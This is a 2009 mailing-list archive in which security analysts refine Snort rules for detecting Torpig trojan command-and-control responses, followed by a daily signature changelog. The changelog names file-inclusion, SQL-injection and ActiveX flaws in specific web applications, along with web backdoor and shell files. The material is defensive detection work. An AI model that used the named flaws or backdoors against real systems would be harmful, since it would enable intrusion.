> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Darren Spruell
phatbuckett at gmail.com

From phatbuckett at gmail.com  Thu May  7 14:11:55 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 7 May 2009 11:11:55 -0700
Subject: [Emerging-Sigs] mebroot/torpig response packet?
In-Reply-To: <1233354623.6623.56.camel@kinta>
References: <839aec700901292052m5f739539s8281c72a2d8c9605@mail.gmail.com>
	<1233354623.6623.56.camel@kinta>
Message-ID: <839aec700905071111s70d2cecdr5e6fcc1f234a36db@mail.gmail.com>

Picking this up again...

Two responses seen from Torpig C&Cs are:

- Simply "okn" indicating current configuration
- "okc" indicating a new configuration is available (and subsequently
served? in the same response? )

would be interesting to have rules identifying both of these conditions.

I thought we might be able to count on a Content-Length header (with
value of '3') as shown in responses on this thread, but the response
shown in the offensivecomputing post lacks it. So anchoring on the
CRLFs is all that strikes me. Maybe worth putting modifiers on the
last content check to start inspecting around where the response body
might end up? 'dsize' check? Follow with a pcre to word-boundary after
the "okn"?

Would someone mind also validating the distance/within on the "200"
content check (or that it's not completely pointless in the first
place?)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN
Possible Torpig C&C response message (okn)";
flow:established,from_server; content:"HTTP/1."; depth:7;
content:"200"; distance:2; within:3; content:"|0d 0a 0d 0a|okn";
nocase; classtype:trojan-activity;
reference:url,offensivecomputing.net/?q=node/909;
reference:url,www.cs.ucsb.edu/~seclab/projects/torpig/index.html;
sid:XXXXXXX; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN
Possible Torpig C&C response message (okc)";
flow:established,from_server; content:"HTTP/1."; depth:7;
content:"200"; distance:2; within:3; content:"|0d 0a 0d 0a|okc";
nocase; classtype:trojan-activity;
reference:url,offensivecomputing.net/?q=node/909;
reference:url,www.cs.ucsb.edu/~seclab/projects/torpig/index.html;
sid:XXXXXXX; rev:1;)

DS

On Fri, Jan 30, 2009 at 3:30 PM, dxp <dxp2532 at gmail.com> wrote:
> I would recommend not to limit the signature to "nginx" server.? I have seen
> various distributed C&C servers of the same trojan drop that do not use
> "nginx".? Although, it wasn't torpig but I would assume the same may show up
> here.
>
> I think the "okn" response as the first 3 bytes is unique enough as long as
> it's anchored to a HTTP response header.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Thu, 2009-01-29 at 21:52 -0700, Darren Spruell wrote:
>
> Throwing this up for commentary... any worth?
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN
> Possible Torpig C&C response message (okn)";
> flow:established,from_server; content:"HTTP/1."; depth:7; content:"|0d
> 0a|Server\: nginx"; nocase; distance:4; within:300; content:"|0d 0a 0d
> 0a|okn"; nocase; classtype:trojan-activity;
> reference:url,offensivecomputing.net/?q=node/909; sid:XXXXXXX; rev:1;)
>
>



-- 
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net  Thu May  7 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu,  7 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090507200010.D17AA4504A@goliath.jonkmans.com>


[***] Results from Oinkmaster started Thu May  7 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
 2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
 2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
 2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
 2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
 2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
 2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
 2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
 2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
 2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
 2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
 2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
 2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
 2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
 2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
 2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
 2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
 2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
 2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
 2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)


[///]     Modified active rules:     [///]

 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
 2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
 2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
 2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
 2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
 2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
 2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
 2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
 2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
 2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
 2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
 2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules)
 2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules)
 2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules)
 2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules)
 2406036 - ET RBN Known Russian Business Network Monitored Domains (37) (emerging-rbn.rules)
 2406037 - ET RBN Known Russian Business Network Monitored Domains (38) (emerging-rbn.rules)
 2406038 - ET RBN Known Russian Business Network Monitored Domains (39) (emerging-rbn.rules)
 2406039 - ET RBN Known Russian Business Network Monitored Domains (40) (emerging-rbn.rules)
 2406040 - ET RBN Known Russian Business Network Monitored Domains (41) (emerging-rbn.rules)
 2406041 - ET RBN Known Russian Business Network Monitored Domains (42) (emerging-rbn.rules)
 2406042 - ET RBN Known Russian Business Network Monitored Domains (43) (emerging-rbn.rules)
 2406043 - ET RBN Known Russian Business Network Monitored Domains (44) (emerging-rbn.rules)
 2406044 - ET RBN Known Russian Business Network Monitored Domains (45) (emerging-rbn.rules)
 2406045 - ET RBN Known Russian Business Network Monitored Domains (46) (emerging-rbn.rules)
 2406046 - ET RBN Known Russian Business Network Monitored Domains (47) (emerging-rbn.rules)
 2406047 - ET RBN Known Russian Business Network Monitored Domains (48) (emerging-rbn.rules)
 2406048 - ET RBN Known Russian Business Network Monitored Domains (49) (emerging-rbn.rules)
 2406049 - ET RBN Known Russian Business Network Monitored Domains (50) (emerging-rbn.rules)
 2406050 - ET RBN Known Russian Business Network Monitored Domains (51) (emerging-rbn.rules)
 2406051 - ET RBN Known Russian Business Network Monitored Domains (52) (emerging-rbn.rules)
 2406052 - ET RBN Known Russian Business Network Monitored Domains (53) (emerging-rbn.rules)
 2406053 - ET RBN Known Russian Business Network Monitored Domains (54) (emerging-rbn.rules)
 2406054 - ET RBN Known Russian Business Network Monitored Domains (55) (emerging-rbn.rules)
 2406055 - ET RBN Known Russian Business Network Monitored Domains (56) (emerging-rbn.rules)
 2406056 - ET RBN Known Russian Business Network Monitored Domains (57) (emerging-rbn.rules)
 2406057 - ET RBN Known Russian Business Network Monitored Domains (58) (emerging-rbn.rules)
 2406058 - ET RBN Known Russian Business Network Monitored Domains (59) (emerging-rbn.rules)
 2406059 - ET RBN Known Russian Business Network Monitored Domains (60) (emerging-rbn.rules)
 2406060 - ET RBN Known Russian Business Network Monitored Domains (61) (emerging-rbn.rules)
 2406061 - ET RBN Known Russian Business Network Monitored Domains (62) (emerging-rbn.rules)
 2406062 - ET RBN Known Russian Business Network Monitored Domains (63) (emerging-rbn.rules)
 2406063 - ET RBN Known Russian Business Network Monitored Domains (64) (emerging-rbn.rules)
 2406064 - ET RBN Known Russian Business Network Monitored Domains (65) (emerging-rbn.rules)
 2406065 - ET RBN Known Russian Business Network Monitored Domains (66) (emerging-rbn.rules)
 2406066 - ET RBN Known Russian Business Network Monitored Domains (67) (emerging-rbn.rules)
 2406067 - ET RBN Known Russian Business Network Monitored Domains (68) (emerging-rbn.rules)
 2406068 - ET RBN Known Russian Business Network Monitored Domains (69) (emerging-rbn.rules)
 2406069 - ET RBN Known Russian Business Network Monitored Domains (70) (emerging-rbn.rules)
 2406070 - ET RBN Known Russian Business Network Monitored Domains (71) (emerging-rbn.rules)
 2406071 - ET RBN Known Russian Business Network Monitored Domains (72) (emerging-rbn.rules)
 2406072 - ET RBN Known Russian Business Network Monitored Domains (73) (emerging-rbn.rules)
 2406073 - ET RBN Known Russian Business Network Monitored Domains (74) (emerging-rbn.rules)
 2406074 - ET RBN Known Russian Business Network Monitored Domains (75) (emerging-rbn.rules)
 2406075 - ET RBN Known Russian Business Network Monitored Domains (76) (emerging-rbn.rules)
 2406076 - ET RBN Known Russian Business Network Monitored Domains (77) (emerging-rbn.rules)
 2406077 - ET RBN Known Russian Business Network Monitored Domains (78) (emerging-rbn.rules)
 2406078 - ET RBN Known Russian Business Network Monitored Domains (79) (emerging-rbn.rules)
 2406079 - ET RBN Known Russian Business Network Monitored Domains (80) (emerging-rbn.rules)
 2406080 - ET RBN Known Russian Business Network Monitored Domains (81) (emerging-rbn.rules)
 2406081 - ET RBN Known Russian Business Network Monitored Domains (82) (emerging-rbn.rules)
 2406082 - ET RBN Known Russian Business Network Monitored Domains (83) (emerging-rbn.rules)
 2406083 - ET RBN Known Russian Business Network Monitored Domains (84) (emerging-rbn.rules)
 2406084 - ET RBN Known Russian Business Network Monitored Domains (85) (emerging-rbn.rules)
 2406085 - ET RBN Known Russian Business Network Monitored Domains (86) (emerging-rbn.rules)
 2406086 - ET RBN Known Russian Business Network Monitored Domains (87) (emerging-rbn.rules)
 2406087 - ET RBN Known Russian Business Network Monitored Domains (88) (emerging-rbn.rules)
 2406088 - ET RBN Known Russian Business Network Monitored Domains (89) (emerging-rbn.rules)
 2406089 - ET RBN Known Russian Business Network Monitored Domains (90) (emerging-rbn.rules)
 2406090 - ET RBN Known Russian Business Network Monitored Domains (91) (emerging-rbn.rules)
 2406091 - ET RBN Known Russian Business Network Monitored Domains (92) (emerging-rbn.rules)
 2406092 - ET RBN Known Russian Business Network Monitored Domains (93) (emerging-rbn.rules)
 2406093 - ET RBN Known Russian Business Network Monitored Domains (94) (emerging-rbn.rules)
 2406094 - ET RBN Known Russian Business Network Monitored Domains (95) (emerging-rbn.rules)
 2406095 - ET RBN Known Russian Business Network Monitored Domains (96) (emerging-rbn.rules)
 2406096 - ET RBN Known Russian Business Network Monitored Domains (97) (emerging-rbn.rules)
 2406097 - ET RBN Known Russian Business Network Monitored Domains (98) (emerging-rbn.rules)
 2406098 - ET RBN Known Russian Business Network Monitored Domains (99) (emerging-rbn.rules)
 2406099 - ET RBN Known Russian Business Network Monitored Domains (100) (emerging-rbn.rules)
 2406100 - ET RBN Known Russian Business Network Monitored Domains (101) (emerging-rbn.rules)
 2406101 - ET RBN Known Russian Business Network Monitored Domains (102) (emerging-rbn.rules)
 2406102 - ET RBN Known Russian Business Network Monitored Domains (103) (emerging-rbn.rules)
 2406103 - ET RBN Known Russian Business Network Monitored Domains (104) (emerging-rbn.rules)
 2406104 - ET RBN Known Russian Business Network Monitored Domains (105) (emerging-rbn.rules)
 2406105 - ET RBN Known Russian Business Network Monitored Domains (106) (emerging-rbn.rules)
 2406106 - ET RBN Known Russian Business Network Monitored Domains (107) (emerging-rbn.rules)
 2406107 - ET RBN Known Russian Business Network Monitored Domains (108) (emerging-rbn.rules)
 2406108 - ET RBN Known Russian Business Network Monitored Domains (109) (emerging-rbn.rules)
 2406109 - ET RBN Known Russian Business Network Monitored Domains (110) (emerging-rbn.rules)
 2406110 - ET RBN Known Russian Business Network Monitored Domains (111) (emerging-rbn.rules)
 2406111 - ET RBN Known Russian Business Network Monitored Domains (112) (emerging-rbn.rules)
 2406112 - ET RBN Known Russian Business Network Monitored Domains (113) (emerging-rbn.rules)
 2406113 - ET RBN Known Russian Business Network Monitored Domains (114) (emerging-rbn.rules)
 2406114 - ET RBN Known Russian Business Network Monitored Domains (115) (emerging-rbn.rules)
 2406115 - ET RBN Known Russian Business Network Monitored Domains (116) (emerging-rbn.rules)
 2406116 - ET RBN Known Russian Business Network Monitored Domains (117) (emerging-rbn.rules)
 2406117 - ET RBN Known Russian Business Network Monitored Domains (118) (emerging-rbn.rules)
 2406118 - ET RBN Known Russian Business Network Monitored Domains (119) (emerging-rbn.rules)
 2406119 - ET RBN Known Russian Business Network Monitored Domains (120) (emerging-rbn.rules)
 2406120 - ET RBN Known Russian Business Network Monitored Domains (121) (emerging-rbn.rules)
 2406121 - ET RBN Known Russian Business Network Monitored Domains (122) (emerging-rbn.rules)
 2406122 - ET RBN Known Russian Business Network Monitored Domains (123) (emerging-rbn.rules)
 2406123 - ET RBN Known Russian Business Network Monitored Domains (124) (emerging-rbn.rules)
 2406124 - ET RBN Known Russian Business Network Monitored Domains (125) (emerging-rbn.rules)
 2406125 - ET RBN Known Russian Business Network Monitored Domains (126) (emerging-rbn.rules)
 2406126 - ET RBN Known Russian Business Network Monitored Domains (127) (emerging-rbn.rules)
 2406127 - ET RBN Known Russian Business Network Monitored Domains (128) (emerging-rbn.rules)
 2406128 - ET RBN Known Russian Business Network Monitored Domains (129) (emerging-rbn.rules)
 2406129 - ET RBN Known Russian Business Network Monitored Domains (130) (emerging-rbn.rules)
 2406130 - ET RBN Known Russian Business Network Monitored Domains (131) (emerging-rbn.rules)
 2406131 - ET RBN Known Russian Business Network Monitored Domains (132) (emerging-rbn.rules)
 2406132 - ET RBN Known Russian Business Network Monitored Domains (133) (emerging-rbn.rules)
 2406133 - ET RBN Known Russian Business Network Monitored Domains (134) (emerging-rbn.rules)
 2406134 - ET RBN Known Russian Business Network Monitored Domains (135) (emerging-rbn.rules)
 2406135 - ET RBN Known Russian Business Network Monitored Domains (136) (emerging-rbn.rules)
 2406136 - ET RBN Known Russian Business Network Monitored Domains (137) (emerging-rbn.rules)
 2406137 - ET RBN Known Russian Business Network Monitored Domains (138) (emerging-rbn.rules)
 2406138 - ET RBN Known Russian Business Network Monitored Domains (139) (emerging-rbn.rules)
 2406139 - ET RBN Known Russian Business Network Monitored Domains (140) (emerging-rbn.rules)
 2406140 - ET RBN Known Russian Business Network Monitored Domains (141) (emerging-rbn.rules)
 2406141 - ET RBN Known Russian Business Network Monitored Domains (142) (emerging-rbn.rules)
 2406142 - ET RBN Known Russian Business Network Monitored Domains (143) (emerging-rbn.rules)
 2406143 - ET RBN Known Russian Business Network Monitored Domains (144) (emerging-rbn.rules)
 2406144 - ET RBN Known Russian Business Network Monitored Domains (145) (emerging-rbn.rules)
 2406145 - ET RBN Known Russian Business Network Monitored Domains (146) (emerging-rbn.rules)
 2406146 - ET RBN Known Russian Business Network Monitored Domains (147) (emerging-rbn.rules)
 2406147 - ET RBN Known Russian Business Network Monitored Domains (148) (emerging-rbn.rules)
 2406148 - ET RBN Known Russian Business Network Monitored Domains (149) (emerging-rbn.rules)
 2406149 - ET RBN Known Russian Business Network Monitored Domains (150) (emerging-rbn.rules)
 2406150 - ET RBN Known Russian Business Network Monitored Domains (151) (emerging-rbn.rules)
 2406151 - ET RBN Known Russian Business Network Monitored Domains (152) (emerging-rbn.rules)
 2406152 - ET RBN Known Russian Business Network Monitored Domains (153) (emerging-rbn.rules)
 2406153 - ET RBN Known Russian Business Network Monitored Domains (154) (emerging-rbn.rules)
 2406154 - ET RBN Known Russian Business Network Monitored Domains (155) (emerging-rbn.rules)
 2406155 - ET RBN Known Russian Business Network Monitored Domains (156) (emerging-rbn.rules)
 2406156 - ET RBN Known Russian Business Network Monitored Domains (157) (emerging-rbn.rules)
 2406157 - ET RBN Known Russian Business Network Monitored Domains (158) (emerging-rbn.rules)
 2406158 - ET RBN Known Russian Business Network Monitored Domains (159) (emerging-rbn.rules)
 2406159 - ET RBN Known Russian Business Network Monitored Domains (160) (emerging-rbn.rules)
 2406160 - ET RBN Known Russian Business Network Monitored Domains (161) (emerging-rbn.rules)
 2406161 - ET RBN Known Russian Business Network Monitored Domains (162) (emerging-rbn.rules)
 2406162 - ET RBN Known Russian Business Network Monitored Domains (163) (emerging-rbn.rules)
 2406163 - ET RBN Known Russian Business Network Monitored Domains (164) (emerging-rbn.rules)
 2406164 - ET RBN Known Russian Business Network Monitored Domains (165) (emerging-rbn.rules)
 2406165 - ET RBN Known Russian Business Network Monitored Domains (166) (emerging-rbn.rules)
 2406166 - ET RBN Known Russian Business Network Monitored Domains (167) (emerging-rbn.rules)
 2406167 - ET RBN Known Russian Business Network Monitored Domains (168) (emerging-rbn.rules)
 2406168 - ET RBN Known Russian Business Network Monitored Domains (169) (emerging-rbn.rules)
 2406169 - ET RBN Known Russian Business Network Monitored Domains (170) (emerging-rbn.rules)
 2406170 - ET RBN Known Russian Business Network Monitored Domains (171) (emerging-rbn.rules)
 2406171 - ET RBN Known Russian Business Network Monitored Domains (172) (emerging-rbn.rules)
 2406172 - ET RBN Known Russian Business Network Monitored Domains (173) (emerging-rbn.rules)
 2406173 - ET RBN Known Russian Business Network Monitored Domains (174) (emerging-rbn.rules)
 2406174 - ET RBN Known Russian Business Network Monitored Domains (175) (emerging-rbn.rules)
 2406175 - ET RBN Known Russian Business Network Monitored Domains (176) (emerging-rbn.rules)
 2406176 - ET RBN Known Russian Business Network Monitored Domains (177) (emerging-rbn.rules)
 2406177 - ET RBN Known Russian Business Network Monitored Domains (178) (emerging-rbn.rules)
 2406178 - ET RBN Known Russian Business Network Monitored Domains (179) (emerging-rbn.rules)
 2406179 - ET RBN Known Russian Business Network Monitored Domains (180) (emerging-rbn.rules)
 2406180 - ET RBN Known Russian Business Network Monitored Domains (181) (emerging-rbn.rules)
 2406181 - ET RBN Known Russian Business Network Monitored Domains (182) (emerging-rbn.rules)
 2406182 - ET RBN Known Russian Business Network Monitored Domains (183) (emerging-rbn.rules)
 2406183 - ET RBN Known Russian Business Network Monitored Domains (184) (emerging-rbn.rules)
 2406184 - ET RBN Known Russian Business Network Monitored Domains (185) (emerging-rbn.rules)
 2406185 - ET RBN Known Russian Business Network Monitored Domains (186) (emerging-rbn.rules)
 2406186 - ET RBN Known Russian Business Network Monitored Domains (187) (emerging-rbn.rules)
 2406187 - ET RBN Known Russian Business Network Monitored Domains (188) (emerging-rbn.rules)
 2406188 - ET RBN Known Russian Business Network Monitored Domains (189) (emerging-rbn.rules)
 2406189 - ET RBN Known Russian Business Network Monitored Domains (190) (emerging-rbn.rules)
 2406190 - ET RBN Known Russian Business Network Monitored Domains (191) (emerging-rbn.rules)
 2406191 - ET RBN Known Russian Business Network Monitored Domains (192) (emerging-rbn.rules)
 2406192 - ET RBN Known Russian Business Network Monitored Domains (193) (emerging-rbn.rules)
 2406193 - ET RBN Known Russian Business Network Monitored Domains (194) (emerging-rbn.rules)
 2406194 - ET RBN Known Russian Business Network Monitored Domains (195) (emerging-rbn.rules)
 2406195 - ET RBN Known Russian Business Network Monitored Domains (196) (emerging-rbn.rules)
 2406196 - ET RBN Known Russian Business Network Monitored Domains (197) (emerging-rbn.rules)
 2406197 - ET RBN Known Russian Business Network Monitored Domains (198) (emerging-rbn.rules)
 2406198 - ET RBN Known Russian Business Network Monitored Domains (199) (emerging-rbn.rules)
 2406199 - ET RBN Known Russian Business Network Monitored Domains (200) (emerging-rbn.rules)
 2406200 - ET RBN Known Russian Business Network Monitored Domains (201) (emerging-rbn.rules)
 2406201 - ET RBN Known Russian Business Network Monitored Domains (202) (emerging-rbn.rules)
 2406202 - ET RBN Known Russian Business Network Monitored Domains (203) (emerging-rbn.rules)
 2406203 - ET RBN Known Russian Business Network Monitored Domains (204) (emerging-rbn.rules)
 2406204 - ET RBN Known Russian Business Network Monitored Domains (205) (emerging-rbn.rules)
 2406205 - ET RBN Known Russian Business Network Monitored Domains (206) (emerging-rbn.rules)
 2406206 - ET RBN Known Russian Business Network Monitored Domains (207) (emerging-rbn.rules)
 2406207 - ET RBN Known Russian Business Network Monitored Domains (208) (emerging-rbn.rules)
 2406208 - ET RBN Known Russian Business Network Monitored Domains (209) (emerging-rbn.rules)
 2406209 - ET RBN Known Russian Business Network Monitored Domains (210) (emerging-rbn.rules)
 2406210 - ET RBN Known Russian Business Network Monitored Domains (211) (emerging-rbn.rules)
 2406211 - ET RBN Known Russian Business Network Monitored Domains (212) (emerging-rbn.rules)
 2406212 - ET RBN Known Russian Business Network Monitored Domains (213) (emerging-rbn.rules)
 2406213 - ET RBN Known Russian Business Network Monitored Domains (214) (emerging-rbn.rules)
 2406214 - ET RBN Known Russian Business Network Monitored Domains (215) (emerging-rbn.rules)
 2406215 - ET RBN Known Russian Business Network Monitored Domains (216) (emerging-rbn.rules)
 2406216 - ET RBN Known Russian Business Network Monitored Domains (217) (emerging-rbn.rules)
 2406217 - ET RBN Known Russian Business Network Monitored Domains (218) (emerging-rbn.rules)
 2406218 - ET RBN Known Russian Business Network Monitored Domains (219) (emerging-rbn.rules)
 2406219 - ET RBN Known Russian Business Network Monitored Domains (220) (emerging-rbn.rules)
 2406220 - ET RBN Known Russian Business Network Monitored Domains (221) (emerging-rbn.rules)
 2406221 - ET RBN Known Russian Business Network Monitored Domains (222) (emerging-rbn.rules)
 2406222 - ET RBN Known Russian Business Network Monitored Domains (223) (emerging-rbn.rules)
 2406223 - ET RBN Known Russian Business Network Monitored Domains (224) (emerging-rbn.rules)
 2406224 - ET RBN Known Russian Business Network Monitored Domains (225) (emerging-rbn.rules)
 2406225 - ET RBN Known Russian Business Network Monitored Domains (226) (emerging-rbn.rules)
 2406226 - ET RBN Known Russian Business Network Monitored Domains (227) (emerging-rbn.rules)
 2406227 - ET RBN Known Russian Business Network Monitored Domains (228) (emerging-rbn.rules)
 2406228 - ET RBN Known Russian Business Network Monitored Domains (229) (emerging-rbn.rules)
 2406229 - ET RBN Known Russian Business Network Monitored Domains (230) (emerging-rbn.rules)
 2406230 - ET RBN Known Russian Business Network Monitored Domains (231) (emerging-rbn.rules)
 2406231 - ET RBN Known Russian Business Network Monitored Domains (232) (emerging-rbn.rules)
 2406232 - ET RBN Known Russian Business Network Monitored Domains (233) (emerging-rbn.rules)
 2406233 - ET RBN Known Russian Business Network Monitored Domains (234) (emerging-rbn.rules)
 2406234 - ET RBN Known Russian Business Network Monitored Domains (235) (emerging-rbn.rules)
 2406235 - ET RBN Known Russian Business Network Monitored Domains (236) (emerging-rbn.rules)
 2406236 - ET RBN Known Russian Business Network Monitored Domains (237) (emerging-rbn.rules)
 2406237 - ET RBN Known Russian Business Network Monitored Domains (238) (emerging-rbn.rules)
 2406238 - ET RBN Known Russian Business Network Monitored Domains (239) (emerging-rbn.rules)
 2406239 - ET RBN Known Russian Business Network Monitored Domains (240) (emerging-rbn.rules)
 2406240 - ET RBN Known Russian Business Network Monitored Domains (241) (emerging-rbn.rules)
 2406241 - ET RBN Known Russian Business Network Monitored Domains (242) (emerging-rbn.rules)
 2406242 - ET RBN Known Russian Business Network Monitored Domains (243) (emerging-rbn.rules)
 2406243 - ET RBN Known Russian Business Network Monitored Domains (244) (emerging-rbn.rules)
 2406244 - ET RBN Known Russian Business Network Monitored Domains (245) (emerging-rbn.rules)
 2406245 - ET RBN Known Russian Business Network Monitored Domains (246) (emerging-rbn.rules)
 2406246 - ET RBN Known Russian Business Network Monitored Domains (247) (emerging-rbn.rules)
 2406247 - ET RBN Known Russian Business Network Monitored Domains (248) (emerging-rbn.rules)
 2406248 - ET RBN Known Russian Business Network Monitored Domains (249) (emerging-rbn.rules)
 2406249 - ET RBN Known Russian Business Network Monitored Domains (250) (emerging-rbn.rules)
 2406250 - ET RBN Known Russian Business Network Monitored Domains (251) (emerging-rbn.rules)
 2406251 - ET RBN Known Russian Business Network Monitored Domains (252) (emerging-rbn.rules)
 2406252 - ET RBN Known Russian Business Network Monitored Domains (253) (emerging-rbn.rules)
 2406253 - ET RBN Known Russian Business Network Monitored Domains (254) (emerging-rbn.rules)
 2406254 - ET RBN Known Russian Business Network Monitored Domains (255) (emerging-rbn.rules)
